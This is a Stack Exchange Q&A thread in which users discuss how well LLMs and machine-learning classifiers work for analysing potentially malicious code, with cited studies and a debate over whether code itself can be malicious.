Can modern AI tools provide any information about the true purpose of potentially malicious code?

Question

A recent question of mine was closed, as I effectively requested code analysis. A comment said:

If you want an analysis, you could pop it into something like chatgpt

Is there any analysis (or anecdotes) about how effective modern AI tools are at identifying the true purpose of a bit of code?

Malicious code is no different to other code. It’s the context that matters- a code that creates a UUID (like yours) for business management is not malicious, but the exact same piece of code used to steal unauthorised information is then malicious as it’s use is malicious. — security_paranoid, Commented Jun 27 at 11:04
AI could tell you what the code does, but then it’s up to you to decide if thats ‘malicious.’ — security_paranoid, Commented Jun 27 at 11:08
That does not necessarily matter. These tools are great for finding hidden pasterns in data. As long as someone can define a set of code that we would like to run and code we would not we can measure the predictive power for an algorithm to classify a previously unseen bit of code into one or other class. It seems plausible that these tools could have such predictive power, I wondered if anyone has looked. — User65535, Commented Jun 27 at 11:08
"true" purpose is subjective. What you asked for was a functional analysis. LLMs do that very well. I removed the opinion-based and tangential part of your question. — schroeder, Commented Jun 27 at 12:40

Sjoerd · Accepted Answer · 2024-06-27 12:36:22Z

5

Our results indicate that while not absolutely accurate yet, some LLMs can efficiently deobfuscate [real-world malicious scripts].
Can LLMs Deeply Detect Complex Malicious Queries? ... our tests on ChatGPT-3.5 ... achieved a remarkable success rate of 83.65%.
Detection of malicious code by applying machine learning classifiers on static features: A state-of-the-art survey - ScienceDirect
Applying Machine Learning Techniques for Detection of Malicious Code in Network Traffic ... preliminary results are encouraging.
The test results show that the proposed system can effectively detect the malware with more than 99% DR, f-measure, and 99.80 accuracy

answered Jun 27 at 12:36

Sjoerd

31.8k13 gold badges84 silver badges111 bronze badges

The Ömer Aslan one looks amazing if it is credible. Such a small model with apparently incredible accuracy. I wonder how generalisation it is.
– User65535
Commented Jun 27 at 13:21
1

@User65535 It's cherrypicking, LLMs are very bad at deobfuscation. Also you would spend much more time trying to make them do the right thing rather than doing it yourself in the first place.
– Margaret Bloom
Commented Jun 27 at 15:12

Add a comment |

security_paranoid · Accepted Answer · 2024-06-28 01:03:17Z

1

Like I said in my comment, actual code is neither malicious or non malicious. It is how the code is used, and your own options that determines this.

With GPT4.0, I confirmed my theory of what your code in your previous question did; it tries to generates a UUID.

Take this for example: would this code seem malicious and environment where good, consented session management is crucial to a client experience? Most people would say probably not.

But would it seem malicious if it was intrusively and sneakily run without you knowing, and with the information used for something like cross site tracking? Most people would say probably.

I’m not saying it is doing that (although it could be)- but it’s impossible to tell its intentions with just the code, which is my whole point.

LMs like ChatGPT don’t have opinions nor background information unless provided, so while AI is great at identifying what code does, whether its malicious is opinionated, situational, and something only you can decide.

answered Jun 28 at 1:03

security_paranoid

1,0212 gold badges5 silver badges17 bronze badges

Classification won’t work well with very generic code like in your example, but that doesn’t mean it’s generally impossible to distinguish between malicious and benign code. For example, there are already large collections of typical attack techniques like MITRE ATT&CK which show that attackers take very specific actions to systematically collect sensitive data, exfiltrate this data, destroy assets, avoid detection etc. In benign code, such goals and the corresponding actions should be rather unusual.
– Ja1024
Commented Jun 28 at 3:42
Of course there will always be corner cases that lead to both false positives and negatives. I also have no clue how well current ML models actually perform at this task. But the approach is valid. A human analyst is facing the same challenges as an ML model and may even take the same approach: They get unknown code, they don’t necessarily have a lot of context information, but they still have to decide whether the code is (likely) malicious. To solve this, looking for typical attack patterns is an obvious choice, and this is what ML can, in principle, do as well.
– Ja1024
Commented Jun 28 at 3:43
@Ja1024 Well of course; I entirely agree- LMs can be really good at spotting certain traffic patterns and data in implementations such as DPI for firewalls, all I am trying to illustrate to the OP is that even on these situations an LM is still only recognising what is happening, for example code that will erase all files then because this is considered ‘malicious’ by it’s instructions it will report it. But yes, I totally agree.
– security_paranoid
Commented Jun 28 at 4:30
And this is just an example.
– security_paranoid
Commented Jun 28 at 4:31

Add a comment |

Stack Exchange Network

Can modern AI tools provide any information about the true purpose of potentially malicious code?

2 Answers 2

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged
code-review
artificial-intelligence
.

Linked

Hot Network Questions

Can modern AI tools provide any information about the true purpose of potentially malicious code?

2 Answers 2

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged code-reviewartificial-intelligence.

Linked

Related

Hot Network Questions

Not the answer you're looking for? Browse other questions tagged
code-review
artificial-intelligence
.